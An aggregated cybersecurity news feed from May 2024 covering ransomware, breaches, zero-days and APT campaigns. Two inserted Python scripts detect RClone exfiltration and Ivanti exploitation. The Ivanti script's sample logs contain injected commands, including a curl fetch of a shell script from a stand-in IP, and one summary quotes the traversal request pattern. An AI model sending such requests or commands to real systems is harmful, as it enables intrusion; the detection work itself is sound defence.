          Heavy rains wreak havoc in southern Brazil, leaving many homeless and raising fears of further chaos. "



          A cyberattack hit the US healthcare giant Ascension

          ciber
          2024-05-11 https://securityaffairs.com/162985/hacking/cyberattack-hit-ascension-healthcare.html
          A cyberattack hit the US Healthcare giant Ascension and is causing disruption of the systems at hospitals in the country. Ascension is one of the largest private healthcare systems in the United States, ranking second in the United States by the number of hospitals as of 2019. The organization was hit by a ransomware attack that severely impacted operations at hospitals […] "



          Ohio Lottery data breach impacted over 538,000 individuals

          financial
          2024-05-11 https://securityaffairs.com/163012/data-breach/ohio-lottery-data-breach.html
          The cyber attack on the Ohio Lottery on Christmas Eve exposed the personal data of over 538,000 individuals. On Christmas Eve, a cyberattack targeting the Ohio Lottery resulted in the exposure of personal data belonging to 538,959 individuals. The organization is notifying the impacted people. Attackers gained access to names or other personal identifiers in […] "

Autosummary: Pierluigi Paganini, May 11, 2024. The cyber attack on the Ohio Lottery on Christmas Eve exposed the personal data of over 538,000 individuals. "


          CISA: Black Basta ransomware breached over 500 orgs worldwide

          exploits ransomware
          2024-05-11 https://www.bleepingcomputer.com/news/security/cisa-black-basta-ransomware-breached-over-500-orgs-worldwide/
CISA and the FBI said today that Black Basta ransomware affiliates breached over 500 organizations between April 2022 and May 2024. [...] "

Autosummary: Its affiliates have since breached many high-profile victims, including German defense contractor Rheinmetall, Hyundai's European division, U.K. technology outsourcing company Capita, industrial automation company and government contractor ABB, the Toronto Public Library, the American Dental Association, Sobeys, Knauf, and Yellow Pages Canada. "


          Cybercriminals are getting faster at exploiting vulnerabilities

          exploits ciber
          2024-05-10 https://www.helpnetsecurity.com/2024/05/10/new-vulnerabilities-number-growth/

          Cybercriminals are targeting the ever-increasing number of new vulnerabilities resulting from the exponential growth in the number and variety of connected devices and an explosion in new applications and online services, according to Fortinet. It’s only natural that attacks looking to exploit those vulnerabilities would rise as well. The latest semiannual report is a snapshot of the active threat landscape and highlights trends from July to December of 2023, including analysis on the speed with … More

          "

Autosummary: Botnets showed incredible resiliency, taking on average 85 days for command and control (C2) communications to cease after first detection. While bot traffic remained steady relative to the first half of 2023, FortiGuard Labs continued to see the more prominent botnets of the last few years, such as Gh0st, Mirai, and ZeroAccess, but three new botnets emerged in the second half of 2023: AndroxGh0st, Prometei, and DarkGate. "


          GenAI enables cybersecurity leaders to hire more entry-level talent

          ciber
          2024-05-10 https://www.helpnetsecurity.com/2024/05/10/genai-opportunities-for-organizations/

          93% of security leaders said public GenAI was in use across their respective organizations, and 91% reported using GenAI specifically for cybersecurity operations, according to Splunk. A total of 1,650 security leaders participated in the global survey, with many reporting that cybersecurity has become easier to manage compared to past years. However, cybersecurity defenders now face a race against adversaries to harness GenAI. Organizations lack a clear GenAI policy According to the report, organizations have … More

          The post GenAI enables cybersecurity leaders to hire more entry-level talent appeared first on Help Net Security.

          "

          Autosummary: “We are in an AI gold rush, with bad actors and security professionals both trying to seize the advantage,” said Patrick Coughlin, SVP, Global Technical Sales, Splunk. "


          Google fixes fifth Chrome zero-day exploited in attacks this year

          exploits
          2024-05-10 https://www.bleepingcomputer.com/news/security/google-fixes-fifth-chrome-zero-day-vulnerability-exploited-in-attacks-in-2024/
Google has released a security update for the Chrome browser to fix the fifth zero-day vulnerability exploited in the wild since the start of the year. [...] "

          Autosummary: "


          Google fixes Chrome zero-day with in-the-wild exploit (CVE-2024-4671)

          exploits
          2024-05-10 https://www.helpnetsecurity.com/2024/05/10/cve-2024-4671/

          Google has fixed a Chrome zero-day vulnerability (CVE-2024-4671), an exploit for which exists in the wild. About CVE-2024-4671 CVE-2024-4671 is a use after free vulnerability in the Visuals component that can be exploited by remote attackers to trigger an exploitable heap corruption via a specially crafted HTML page. “Successful exploitation of this vulnerability could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user … More

          The post Google fixes Chrome zero-day with in-the-wild exploit (CVE-2024-4671) appeared first on Help Net Security.

          "

          Autosummary: "


          Chrome Zero-Day Alert — Update Your Browser to Patch New Vulnerability

          exploits
          2024-05-10 https://thehackernews.com/2024/05/chrome-zero-day-alert-update-your.html
          Google on Thursday released security updates to address a zero-day flaw in Chrome that it said has been actively exploited in the wild. Tracked as CVE-2024-4671, the high-severity vulnerability has been described as a case of use-after-free in the Visuals component. It was reported by an anonymous researcher on May 7, 2024. Use-after-free bugs, which arise when a program "

          Autosummary: "


          Malicious Android Apps Pose as Google, Instagram, WhatsApp, Spread via Smishing

          financial
          2024-05-10 https://thehackernews.com/2024/05/malicious-android-apps-pose-as-google.html
Malicious Android apps masquerading as Google, Instagram, Snapchat, WhatsApp, and X (formerly Twitter) have been observed to steal users' credentials from compromised devices. "This malware uses famous Android app icons to mislead users and trick victims into installing the malicious app on their devices," the SonicWall Capture Labs threat research team said in a recent report. The "

          Autosummary: The phishing URLs mimic the login pages of well-known services like Facebook, GitHub, Instagram, LinkedIn, Microsoft, Netflix, PayPal, Proton Mail, Snapchat, Tumblr, X, WordPress, and Yahoo. "


          Ohio Lottery ransomware attack impacts over 538,000 individuals

          exploits ransomware
          2024-05-10 https://www.bleepingcomputer.com/news/security/ohio-lottery-ransomware-attack-impacts-over-538-000-individuals/
The Ohio Lottery is sending data breach notification letters to over 538,000 individuals affected by a cyberattack that hit the organization's systems on Christmas Eve. [...] "

Autosummary: Breach claimed by DragonForce ransomware: While the Ohio Lottery didn't reveal the nature of the incident, which affected mobile and prize-cashing operations, the DragonForce ransomware gang claimed the attack days later. "


          Dell notifies customers about data breach

          financial
          2024-05-10 https://www.malwarebytes.com/blog/news/2024/05/dell-notifies-customers-about-data-breach
          Dell has notified some customers about a data breach reported to include 49 million records. "

Autosummary: [Screenshot taken from the Breach Forums] According to Menelik, the data includes: the full name of the buyer or company name; address including postal code and country; unique seven-digit service tag of the system; shipping date of the system; warranty plan; serial number; Dell customer number; Dell order number. Most of the affected systems were sold in the US, China, India, Australia, and Canada. Users on Reddit reported getting an email from Dell which was apparently sent to customers whose information was accessed during this incident: “At this time, our investigation indicates limited types of customer information was accessed, including: name; physical address; Dell hardware and order information, including service tag, item description, date of order and related warranty information.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          Boeing refused to pay $200 million LockBit ransomware demand

          exploits ransomware
          2024-05-10 https://www.bitdefender.com/blog/hotforsecurity/boeing-refused-to-pay-200-million-ransomware-demand-from-lockbit-gang/
          Boeing has confirmed that it received a demand for a massive $200 million after a ransomware attack by the notorious LockBit hacking group in October 2023. The company confirmed its link to the indictment of Dmitry Yuryevich Khoroshev, who was identified this week by the US Department of Justice as the true identity of LockBitSupp, the kingpin of the LockBit gang. Read more in my article on the Hot for Security blog. "

          Autosummary: "


          North Korean Hackers Deploy New Golang Malware "Durian" Against Crypto Firms

          exploits
          2024-05-10 https://thehackernews.com/2024/05/north-korean-hackers-deploy-new-golang.html
          The North Korean threat actor tracked as Kimsuky has been observed deploying a previously undocumented Golang-based malware dubbed Durian as part of highly-targeted cyber attacks aimed at South Korean cryptocurrency firms. "Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads and exfiltration of files," Kaspersky& "

Autosummary: The adversarial collective, also known as APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is said to be aligned with North Korea's Ministry of State Security (MSS) and tasked with covert intelligence gathering in support of the nation's strategic military, political, and economic interests. "


          CensysGPT: AI-Powered Threat Hunting for Cybersecurity Pros (Webinar)

          ciber
          2024-05-10 https://thehackernews.com/2024/05/censysgpt-ai-powered-threat-hunting-for.html
Artificial intelligence (AI) is transforming cybersecurity, and those leading the charge are using it to outsmart increasingly advanced cyber threats. Join us for an exciting webinar, "The Future of Threat Hunting is Powered by Generative AI," where you'll explore how AI tools are shaping the future of cybersecurity defenses. During the session, Censys Security Researcher Aidan Holland will "

Autosummary: Whether you're a cybersecurity pro, an IT enthusiast, or simply intrigued by the future of cyber defense, this webinar is essential. "


          Google fixes fifth actively exploited Chrome zero-day this year

          exploits
          2024-05-10 https://securityaffairs.com/162976/hacking/5th-chrome-zero-day-2024.html
Google has released an update to fix the fifth actively exploited zero-day vulnerability in the Chrome browser since the start of the year. Google this week released security updates to address a zero-day flaw, tracked as CVE-2024-4671, in the Chrome browser. The vulnerability is the fifth zero-day flaw in the Google browser that is exploited in the […] "

Autosummary: Google has released an update to fix the fifth actively exploited zero-day vulnerability in the Chrome browser since the start of the year. "


          Russia-linked APT28 targets government Polish institutions

          government
          2024-05-10 https://securityaffairs.com/162965/apt/russia-linked-apt28-targets-government-polish-institutions.html
          CERT Polska warns of a large-scale malware campaign against Polish government institutions conducted by Russia-linked APT28. CERT Polska and CSIRT MON teams issued a warning about a large-scale malware campaign targeting Polish government institutions, allegedly orchestrated by the Russia-linked APT28 group. The attribution of the attacks to the Russian APT is based on similarities with […] "

Autosummary: The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The attack chain includes the download of a ZIP archive file from webhook[.]site, which contains a Windows calculator with a changed name, e.g. IMG-238279780.jpg.exe, which pretends to be a photo and is used to trick the recipient into clicking on it, and a .bat script. "


          Dell API abused to steal 49 million customer records in data breach

          financial
          2024-05-10 https://www.bleepingcomputer.com/news/security/dell-api-abused-to-steal-49-million-customer-records-in-data-breach/
The threat actor behind the recent Dell data breach revealed they scraped information of 49 million customer records using a partner portal API they accessed as a fake company. [...] "

Autosummary: Menelik says the stolen customer records include the following hardware breakdown: Monitors: 22,406,133; Alienware Notebooks: 447,315; Chromebooks: 198,713; Inspiron Notebooks: 11,257,567; Inspiron Desktops: 1,731,767; Latitude Laptops: 4,130,510; Optiplex: 5,177,626; Poweredge: 783,575; Precision Desktops: 798,018; Precision Notebooks: 486,244; Vostro Notebooks: 148,087; Vostro Desktops: 37,427; XPS Notebooks: 1,045,302; XPS/Alienware desktops: 399,695. The threat actors said they emailed Dell on April 12th and 14th to report the bug to their security team, sharing the email with BleepingComputer. This data breach contained customer order data, including warranty information, service tags, customer names, installed locations, customer numbers, and order numbers. "


          Ascension redirects ambulances after suspected ransomware attack

          exploits ransomware
          2024-05-10 https://www.bleepingcomputer.com/news/security/healthcare-giant-ascension-redirects-ambulances-after-suspected-Black-Basta-ransomware-attack/
Ascension, a major U.S. healthcare network, is diverting ambulances from several hospitals due to a suspected ransomware attack that has been causing clinical operation disruptions and system outages since Wednesday. [...] "

          Autosummary: Since then, its affiliates have breached many high-profile victims, including German defense contractor Rheinmetall, U.K. technology outsourcing company Capita, industrial automation company and government contractor ABB, and the Toronto Public Library. "


          Widely used modems in industrial IoT devices open to SMS attack

          industry
          2024-05-10 https://www.bleepingcomputer.com/news/security/widely-used-modems-in-industrial-iot-devices-open-to-sms-attack/
          Security flaws in Telit Cinterion cellular modems, widely used in sectors including industrial, healthcare, and telecommunications, could allow remote attackers to execute arbitrary code via SMS. [...] "

Autosummary: Although the research targeted the Cinterion EHS5-E series modem, because other products from the vendor have similar software and hardware architecture additional variants are also impacted: Cinterion BGS5, Cinterion EHS5/6/7, Cinterion PDS5/6/8, Cinterion ELS61/81, and Cinterion PLS62. Telit fixed some of the disclosed vulnerabilities but some remain unpatched, Kaspersky told BleepingComputer. "


          The Week in Ransomware - May 10th 2024 - Chipping away at LockBit

          exploits ransomware
          2024-05-10 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-10th-2024-chipping-away-at-lockbit/
          After many months of taunting law enforcement and offering a million-dollar reward to anyone who could reveal his identity, the FBI and NCA have done just that, revealing the name of LockBitSupp, the operator of the LockBit ransomware operation. [...] "

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @serghei, @fwosar, @LawrenceAbrams, @malwrhunterteam, @Seifreed, @Ionut_Ilascu, @BleepinComputer, @demonslay335, @snlyngaas, @pcrisk, @AJVicens, @chainalysis, @F_A_C_C_T_, @zackwhittaker, @H4ckManac, and @JakubKroustek. May 6th 2024: A historic surge of ransomware incidents and payment totals in 2023 was not without resistance, as significant actions were taken against ransomware actors in 2023 and early 2024, including notable disruptions on Qakbot malware, and the LockBit and ALPHV-BlackCat ransomware-as-a-service (RaaS) groups. "


          #StopRansomware: Black Basta

          exploits
          2024-05-10 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a

          SUMMARY

          Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

          The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.

          This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally.

          Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a .onion

Autosummary: According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472, [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527, [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation [T1068].[1],[2] Exfiltration and Encryption: Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. SoftPerfect: a network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. "
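The advisory names two tools a defender can hunt for directly: SoftPerfect's netscan.exe for discovery and RClone for exfiltration ahead of encryption. The following is an added example and not code from the advisory or from the authoring organizations. It runs over constructed Sysmon-style process-creation events (JSON lines with a hypothetical field layout), tags netscan.exe by binary name, tags RClone by binary name and, when the binary has been renamed, by its command-line shape (a copy/sync-style verb followed by a remote:path target, a heuristic of mine rather than anything the advisory states), and then flags a host where discovery preceded exfiltration within a time window. Hostnames, paths, the netscan command line and the six-hour window are assumptions.

```python
"""Added example: correlate SoftPerfect netscan (discovery) with RClone (exfiltration)
per host over constructed Sysmon-style process events. Not from the CISA advisory."""
import json
import re
from datetime import datetime, timedelta
from typing import Optional

# Constructed events as JSON lines; field names loosely mimic Sysmon Event ID 1 (assumption).
SAMPLE_EVENTS = r"""
{"host": "FS01", "ts": "2024-05-08T21:10:00", "image": "C:\\Tools\\netscan.exe", "cmdline": "netscan.exe 10.0.0.1-10.0.0.254"}
{"host": "FS01", "ts": "2024-05-08T23:40:00", "image": "C:\\Windows\\Temp\\svchost.exe", "cmdline": "svchost.exe copy D:\\Finance mega:drop --transfers 32 -q"}
{"host": "WS07", "ts": "2024-05-08T09:00:00", "image": "C:\\Program Files\\rclone\\rclone.exe", "cmdline": "rclone.exe sync C:\\Users\\bob\\Backup onedrive:backup"}
{"host": "WS07", "ts": "2024-05-08T09:05:00", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"}
""".strip()

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone addresses remotes as name:path; require 2+ chars before ':' so a drive letter (D:\) is not a remote.
REMOTE_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_-]+:")
NETSCAN_NAMES = {"netscan.exe"}   # SoftPerfect scanner binary named in the advisory


def tag_event(ev: dict) -> Optional[str]:
    """Label one process-creation event, or return None if it is uninteresting."""
    image = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    argv = ev["cmdline"].split()
    if image in NETSCAN_NAMES:
        return "discovery:netscan"
    if image == "rclone.exe":
        return "exfil:rclone"
    # A renamed rclone keeps the rclone command shape: <verb> <src> <remote:path> (heuristic).
    if len(argv) >= 3 and argv[1].lower() in RCLONE_VERBS and any(REMOTE_RE.match(a) for a in argv[2:]):
        return "exfil:rclone-renamed"
    return None


def correlate(events_text: str, window: timedelta = timedelta(hours=6)) -> dict:
    """Group tagged events per host; 'chain' is True when a scan preceded exfil within the window."""
    per_host = {}
    for line in events_text.splitlines():
        ev = json.loads(line)
        tag = tag_event(ev)
        if tag:
            per_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), tag))
    findings = {}
    for host, hits in per_host.items():
        hits.sort()
        scans = [t for t, tag in hits if tag.startswith("discovery:")]
        exfil = [t for t, tag in hits if tag.startswith("exfil:")]
        chain = any(timedelta(0) <= e - s <= window for s in scans for e in exfil)
        findings[host] = {"tags": [tag for _, tag in hits], "chain": chain}
    return findings


if __name__ == "__main__":
    for host, finding in correlate(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if finding["chain"] else "single", finding["tags"])
```

The renamed-binary heuristic is deliberately narrow (a verb plus a remote:path argument) so that ordinary Windows copy tools operating on drive letters do not trip it; broaden it only with telemetry that carries the original file name or binary hash.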


          In it to win it! WeLiveSecurity shortlisted for European Cybersecurity Blogger Awards

          ciber
          2024-05-10 https://www.welivesecurity.com/en/cybersecurity/welivesecurity-shortlisted-european-security-blogger-awards/
          We’re thrilled to announce that WeLiveSecurity has been named a finalist in the Corporates – Best Cybersecurity Vendor Blog category of the European Cybersecurity Blogger Awards 2024 "

          Autosummary: "


          3 CIS resources to help you drive your cloud cybersecurity

          ciber
          2024-05-09 https://www.helpnetsecurity.com/2024/05/09/cloud-cybersecurity-cis-resources/

          In the process of moving to the cloud, you need a security-first cloud migration strategy that considers both your security and compliance requirements upfront. In this article, we’ll discuss how you can use resources from the Center for Internet Security (CIS) to create such an approach. Security choices in the cloud To create a cloud security program, you have two main options to consider. As your first option, you can choose to manage the security … More

          The post 3 CIS resources to help you drive your cloud cybersecurity appeared first on Help Net Security.

          "

          Autosummary: The CIS Critical Security Controls (CIS Controls) The CIS Controls consist of prescriptive, prioritized, and simplified security best practices that you can use to strengthen your cybersecurity posture across your environments, including in the cloud.The CIS Controls v8 Cloud Companion Guide provides context around how each Control applies not only to the cloud but also to individual service models, what your responsibility looks like for a Control within applicable service models, and what products, tools, and threat information (if any) you need to consider. CIS Build Kits and CIS-CAT The Benchmarks, including the Foundations Benchmarks and Cloud Service Category Benchmarks, are available in Word, Excel, and PDF formats. "


          Regulators are coming for IoT device security

          industry
          2024-05-09 https://www.helpnetsecurity.com/2024/05/09/iot-device-security/

          Cybersecurity is a relatively new challenge for many IoT device makers who have traditionally produced non-connected devices. These devices were less vulnerable to exploitation and, as a result, manufacturers often lack the expertise and experience needed to effectively secure their connected products. IoT devices are built on a foundation of insecure software—a large portion of the open-source software and the chips used to build devices are poorly secured. Chipmakers are constantly getting caught sneaking hidden … More

          The post Regulators are coming for IoT device security appeared first on Help Net Security.

          "

Autosummary: While we do not yet know how aggressively regulators will enforce these new statutes, we recommend IoT manufacturers start investing in the following security features: Over-the-air (OTA) software update: The ability to update your device’s software is your escape hatch in the event a security issue is discovered after your device has shipped. Observability: Catching and fixing software bugs such as buffer overflows reinforces the security of your device, and monitoring via metrics can help you identify compromises (e.g., by spotting odd network usage patterns by a device). The device must be capable of identifying, logging, and reporting security events (e.g., compromises) to its manufacturer. "


          Global ransomware crisis worsens

          exploits ransomware
          2024-05-09 https://www.helpnetsecurity.com/2024/05/09/global-ransomware-crisis-worsens/

          Ransomware and extortion incidents surged by 67% in 2023, according to NTT Security Holdings’ 2024 Global Threat Intelligence Report. Global ransomware crisis After a down year in 2022, ransomware and extortion incidents increased in 2023. More than 5,000 ransomware victims were detected or posted across multiple social channels, up from approximately 3,000 in 2022. The number of victims is likely higher because the research does not reflect incidents where ransoms were paid before the listing … More

          The post Global ransomware crisis worsens appeared first on Help Net Security.

          "

          Autosummary: “Our 2023 report highlighted the increase in cyberthreats affecting day to day life, economic conditions, and privacy,” said Jeremy Nichols, NTT Security Holdings’ Global Threat Intelligence Center director. "


          Ransomware attacks impact 20% of sensitive data in healthcare orgs

          exploits
          2024-05-09 https://www.helpnetsecurity.com/2024/05/09/healthcare-industry-ransomware-incidents/

          Recent cyber incidents demonstrate the healthcare industry continues to be a prime target for ransomware hackers, according to Rubrik. New research by Rubrik Zero Labs reveals that ransomware attacks produce larger impacts against these healthcare targets. In fact, the report estimates that one fifth of all sensitive data belonging to healthcare organizations is impacted in each ransomware attack. “Despite the fallout of cyberattacks dominating headlines, data risk is an issue that continues to be murky … More

          The post Ransomware attacks impact 20% of sensitive data in healthcare orgs appeared first on Help Net Security.

          "

Autosummary: The research was conducted in the US, UK, France, Germany, Italy, Netherlands, Japan, Australia, Singapore, and India between January 18 and January 30, 2024. Of the external organizations victimized in a cyberattack in 2023, many were attacked across multiple aspects of their hybrid environment with 67% of attacks impacting SaaS data, 66% for the cloud, and 51% for on-premises locations. "


          DocGo patient health data stolen in cyberattack

          ciber
          2024-05-09 https://www.malwarebytes.com/blog/news/2024/05/docgo-patient-health-data-stolen-in-cyberattack
          Medical health care provider DocGo has disclosed a cyberincident where an attacker gained access to protected health information. "

Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          Horse stranded on rooftop and airport floods in Brazil

          latam
          2024-05-09 https://www.bbc.co.uk/news/world-latin-america-68981957
Aerials show a horse stranded on a rooftop and a flooded airport in Brazil's Rio Grande do Sul. "

          Autosummary: "


          Dell warns of data breach, 49 million customers allegedly affected

          financial
          2024-05-09 https://www.bleepingcomputer.com/news/security/dell-warns-of-data-breach-49-million-customers-allegedly-affected/
          Dell is warning customers of a data breach after a threat actor claimed to have stolen information for approximately 49 million customers. [...] "

          Autosummary: Name Physical address Dell hardware and order information, including service tag, item description, date of order, and related warranty information The company stresses that the stolen information does not include financial or payment information, email addresses, or telephone numbers and that they are working with law enforcement and a third-party forensics firm to investigate the incident. "


          Mirai Botnet Exploits Ivanti Connect Secure Flaws for Malicious Payload Delivery

          exploits
          2024-05-09 https://thehackernews.com/2024/05/mirai-botnet-exploits-ivanti-connect.html
          Two recently disclosed security flaws in Ivanti Connect Secure (ICS) devices are being exploited to deploy the infamous Mirai botnet. That"s according to findings from Juniper Threat Labs, which said the vulnerabilities CVE-2023-46805 and CVE-2024-21887 have been leveraged to deliver the botnet payload. While CVE-2023-46805 is an authentication bypass flaw, "

          Autosummary: "


          Mirai botnet also spreads through the exploitation of Ivanti Connect Secure bugs

          exploits
          2024-05-09 https://securityaffairs.com/162936/cyber-crime/ivanti-connect-secure-flaws-mirai-botnet.html
          Threat actors exploit recently disclosed Ivanti Connect Secure (ICS) vulnerabilities to deploy the Mirai botnet. Researchers from Juniper Threat Labs reported that threat actors are exploiting recently disclosed Ivanti Connect Secure (ICS) vulnerabilities CVE-2023-46805 and CVE-2024-21887 to drop the payload of the Mirai botnet. In early January, the software firm reported that threat actors are exploiting two […] "

Autosummary: Below is the request employed in the attacks observed by the experts: GET /api/v1/totp/user-backup-code/../../license/keys-status/{Any Command} “Others have observed instances in the wild where attackers have exploited this vulnerability using both curl and Python-based reverse shells, enabling them to take control of vulnerable systems. "
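The request quoted above chains the two bugs: the traversal out of the unauthenticated /api/v1/totp/user-backup-code/ endpoint lands on /license/keys-status/, where the trailing segment is the injected command. As an added example that is not from Juniper Threat Labs or from the article, the following Python scans constructed access-log lines (a hypothetical common-log layout, not real ICS logs) for that pattern: it percent-decodes the path twice to catch double encoding, collapses the '..' segments, and checks whether a request that entered via the TOTP backup-code path resolved onto the license keys-status path. The shell-metacharacter check on the trailing segment is my stand-in for the page's {Any Command} placeholder, and the addresses and payloads in the sample lines are constructed.

```python
"""Added example: flag ICS requests that traverse from the unauthenticated TOTP
backup-code path into /license/keys-status/ (the pattern quoted on the page).
Log layout, addresses and payloads below are constructed, not real traffic."""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines in a common-log-like layout (assumption:
# real ICS logs are laid out differently; adapt LINE_RE to your source).
SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2024:10:01:02 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/;id HTTP/1.1" 200 512
10.0.0.6 - - [09/May/2024:10:01:03 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 2048
10.0.0.7 - - [09/May/2024:10:01:04 +0000] "GET /api/v1/totp/user-backup-code/%2e%2e/%2e%2e/license/keys-status/;curl%20http://203.0.113.9/x.sh HTTP/1.1" 200 77
10.0.0.8 - - [09/May/2024:10:01:05 +0000] "GET /api/v1/license/keys-status/ HTTP/1.1" 401 0
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Entry point reachable without authentication (CVE-2023-46805 bypass, per the page)
UNAUTH_PREFIX = "/api/v1/totp/user-backup-code/"
# Where the '..' segments land (CVE-2024-21887 command injection, per the page)
TARGET = "/api/v1/license/keys-status"
SHELL_META = set(";|&`$")   # heuristic stand-in for the page's "{Any Command}" placeholder


def classify(path: str) -> str:
    """Return 'traversal+cmd', 'traversal' or 'benign' for one request path."""
    raw = unquote(unquote(path.split("?", 1)[0]))   # decode twice: catches %252e%252e
    norm = posixpath.normpath(raw)                   # collapses the '..' hops
    if raw.startswith(UNAUTH_PREFIX) and ".." in raw.split("/") and norm.startswith(TARGET):
        tail = norm[len(TARGET):]
        return "traversal+cmd" if any(c in SHELL_META for c in tail) else "traversal"
    return "benign"


def scan(log_text: str) -> list:
    """Parse log lines and return the suspicious ones with source, timestamp, status and verdict."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                       # unparseable line: skip rather than crash
        verdict = classify(m["path"])
        if verdict != "benign":
            hits.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]),
                         "verdict": verdict, "path": m["path"]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["src"]} {hit["verdict"]} HTTP {hit["status"]} {hit["path"]}')
```

Matching on the normalized path rather than on the literal "../../" string is what keeps the percent-encoded and double-encoded variants from slipping past; a 200 response on a flagged line is the signal that the injection likely executed.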


          Zscaler is investigating data breach claims

          financial
          2024-05-09 https://securityaffairs.com/162927/cyber-crime/zscaler-investigating-data-breach-claims.html
          Cybersecurity firm Zscaler is investigating claims of a data breach after hackers offered access to its network. Cybersecurity firm Zscaler is investigating allegations of a data breach following reports that threat actors are offering for sale access to its network. The company confirmed that there is no impact or compromise to its customer, production and […] "

          Autosummary: IntelBroker has offered to sell “confidential and highly critical logs packed with credentials”, including SMTP access, PAuth access, and SSL passkeys and certificates, for a total price of $20,000 in cryptocurrency. "


          Citrix warns admins to manually mitigate PuTTY SSH client bug

          exploits
          2024-05-09 https://www.bleepingcomputer.com/news/security/citrix-warns-admins-to-manually-mitigate-putty-ssh-client-bug/
Citrix notified customers this week to manually mitigate a PuTTY SSH client vulnerability that could allow attackers to steal a XenCenter admin's private SSH key. [...] "

          Autosummary: "


          British Columbia investigating cyberattacks on government networks

          government ciber
          2024-05-09 https://www.bleepingcomputer.com/news/security/british-columbia-investigating-cyberattacks-on-government-networks/
The Government of British Columbia is investigating multiple "cybersecurity incidents" that have impacted the Canadian province's government networks. [...] "

          Autosummary: "


          Kremlin-Backed APT28 Targets Polish Institutions in Large-Scale Malware Campaign

          exploits
          2024-05-09 https://thehackernews.com/2024/05/kremlin-backed-apt28-targets-polish.html
Polish government institutions have been targeted as part of a large-scale malware campaign orchestrated by a Russia-linked nation-state actor called APT28. "The campaign sent emails with content intended to arouse the recipient's interest and persuade him to click on the link," the computer emergency response team, CERT Polska, said in a Wednesday bulletin. Clicking on the link "

Autosummary: The next step involves the download of a ZIP archive file from webhook[.]site, which contains the Windows Calculator binary that masquerades as a JPG image file ("IMG-238279780.jpg.exe"), a hidden batch script file, and another hidden DLL file ("WindowsCodecs.dll"). "


          Dell discloses data breach impacting millions of customers

          financial
          2024-05-09 https://securityaffairs.com/162942/cyber-crime/dell-data-breach-2.html
          Dell disclosed a security breach that exposed millions of customers’ names and physical mailing addresses. IT giant Dell suffered a data breach exposing customers’ names and physical addresses, the company notified impacted individuals. The company launched an investigation into the incident that involved a Dell portal, which contains a database with limited types of customer […] "

          Autosummary: "


          Poland says Russian military hackers target its govt networks

          rusia-ucrania
          2024-05-09 https://www.bleepingcomputer.com/news/security/poland-says-russian-military-hackers-target-its-govt-networks/
Poland says a state-backed threat group linked to Russia's military intelligence service (GRU) has been targeting Polish government institutions throughout the week. [...] "

Autosummary: According to evidence found by CSIRT MON, the country's Computer Security Incident Response Team (led by the Polish Minister of National Defense) and CERT Polska (the Polish computer emergency response team), Russian APT28 state hackers attacked multiple government institutions in a large-scale phishing campaign. "


          Monday.com removes "Share Update" feature abused for phishing attacks

          financial
          2024-05-09 https://www.bleepingcomputer.com/news/security/mondaycom-removes-share-update-feature-abused-for-phishing-attacks/
          Project management platform Monday.com has removed its "Share Update" feature after threat actors abused it in phishing attacks. [...] "

Autosummary: "We were made aware of the misuse of a monday.com feature named "Share Update," which allows users to share an update with someone who isn't a member of their account," a Monday.com spokesperson told BleepingComputer. "


